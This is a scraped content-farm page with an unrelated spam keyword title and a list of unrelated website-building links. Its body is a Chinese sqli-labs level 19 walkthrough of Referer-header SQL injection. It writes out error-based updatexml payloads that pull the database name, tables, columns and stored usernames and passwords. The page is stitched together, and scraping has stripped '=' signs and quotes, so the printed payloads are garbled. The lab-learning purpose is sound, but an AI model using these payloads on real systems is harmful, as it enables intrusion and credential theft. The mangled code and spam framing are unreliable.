当前位置: 首页 > news >正文

石柱县建设局网站珠海网站建设方案维护

石柱县建设局网站,珠海网站建设方案维护,凡客的意思,平台公司和国企的区别文章目录 前言一、回顾上一关知识点二、靶场第十九关通关思路1、判断注入点2、爆数据库名3、爆数据库表4、爆数据库列5、爆数据库关键信息 总结 前言 此文章只用于学习和反思巩固sql注入知识#xff0c;禁止用于做非法攻击。注意靶场是可以练习的平台#xff0c;不能随意去尚… 文章目录 前言一、回顾上一关知识点二、靶场第十九关通关思路1、判断注入点2、爆数据库名3、爆数据库表4、爆数据库列5、爆数据库关键信息 总结 前言 此文章只用于学习和反思巩固sql注入知识禁止用于做非法攻击。注意靶场是可以练习的平台不能随意去尚未授权的网站做渗透测试 一、回顾上一关知识点 上一关我们通过http头部的user-agent值进行注入了解了http头部的一些常见可以注入的地方。这一关同样也是http头部注入只不过不是user-agent了。这一关我就不先看源码了有了上一关经验。 二、靶场第十九关通关思路 1、判断注入点2、爆数据库名3、爆数据库表4、爆数据库列5、爆数据库关键信息 1、判断注入点 这里发现19关页面和上一关基本没区别我们这里用一个测试账号登录(用admin)。因为登录才能记录用户的信息。(如图所示) 这里发现页面回显了一个referer字段从上一关讲解可以知道referer字段是http请求头部内容之一。它的作用是来记录你源地址url的因为我没有跳转到其他页面就是在第十九关页面输信息。所以referer字段就是第十九关的地址。因为页面带回的这个referer字段内容那么可想而知会不会是后台管理员把referer拼接到数据库后回显到web页面的呢我们不妨试一试 用 and 11和and 12 发现页面正常排除数字型。(如图所示) 直接提交单引号发现页面报错报错语句为 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘xxx.xxx.xxx.xxx’)’ at line 1 通过报错语句可以猜测原始语句应该是 (refer,ip)因为我们多了一个单引号所以报错了我们尝试构造payload 也就是 1,1)#那么在原始语句就是 (refer,1)#,ip)这样就构造成功了页面正常(如图所示) 现在我们来看源代码看看是不是这么回事 发现是和我们想到的语句一样。因为有报错回显无回显数据内容所以用报错盲注。 2、爆数据库名 注入语句为 1 and updatexml(1,concat(0x3a,(select database()),0x3a),1),1)#3、爆数据库表 注入语句为 1 and updatexml(1,concat(0x3a,(select table_name from information_schema.tables where table_schemadatabase() limit 3,1),0x3a),1),1)#得到关键数据库表名users 4、爆数据库列 注入语句为 1 and updatexml(1,concat(0x3a,(select column_name from information_schema.columns where table_schemadatabase() and table_nameusers limit 1,1),0x3a),1),1)#1 and updatexml(1,concat(0x3a,(select column_name from information_schema.columns where table_schemadatabase() and table_nameusers limit 2,1),0x3a),1),1)#得到关键数据库列usernamepassword 5、爆数据库关键信息 注入语句为 1 and updatexml(1,concat(0x3a,(select password from users limit 0,1),0x3a),1),1)#1 and updatexml(1,concat(0x3a,(select username from users limit 0,1),0x3a),1),1)#得到账号密码 总结 这一关也是通过http头部注入只是注入点不同。只要知道原理和怎么构造payload的话基本没什么问题。此文章是小白自己为了巩固sql注入而写的大佬路过请多指教
http://www.zqtcl.cn/news/48496/

相关文章:

  • 画流程图的网站外贸产品开发网站
  • 电子商务安全问题 网站权限管理三亚住房和城乡建设厅网站
  • 浙江天奥建设集团网站开发一平方赔多少钱
  • 建设现金分期网站网站怎么做淘宝客
  • title 镇江网站建设网站建设对公司有什么好处
  • 公众号怎么做微网站吗行业网站推广
  • 海口网站建设美丽网站商场模板
  • 网站制作 手机版wordpress 用户列表
  • wordpress不适合做大站做游戏网站用什么软件
  • 南昌的网站设计在线做动图的网站
  • 制作电子商务网站成都网页设计培训机构
  • html5 的网站仪征建设局招投标网站
  • 网站英文转换中文版莆田哪里有做网站的
  • 哪家企业网站建设好手机浏览器网址导航
  • 用illustrator做网站做淘宝是不是要两根网站
  • it外包公司什么意思佛山债优化
  • 深圳公司网站建设公司动画设计师招聘
  • 用手机能创建网站吗江苏建设银行网站
  • 网站搭建十大品牌公司免费的舆情网站
  • 网站推广工具网络东莞网站开发公司
  • 实惠的网站建设公司网站开发设计的步骤
  • 综合网站开发山东专业的网站建设
  • 如何给公司做自己的网站网站上内容列表怎么做
  • 巴中市建设厅官方网站网站不收录原因
  • 重庆网站开发公司推广方式是什么意思
  • 宁夏建设工程招标投标管理中心网站wordpress图片剪裁插件
  • 网站建设硬件要求公网站建设
  • 住房和城乡建设部网站焊工查询网站结构该怎么做
  • 网站颜色正确搭配实例网络推广策划案格式模板和范文
  • 济南众筹网站建设微信公众号内容编辑及排版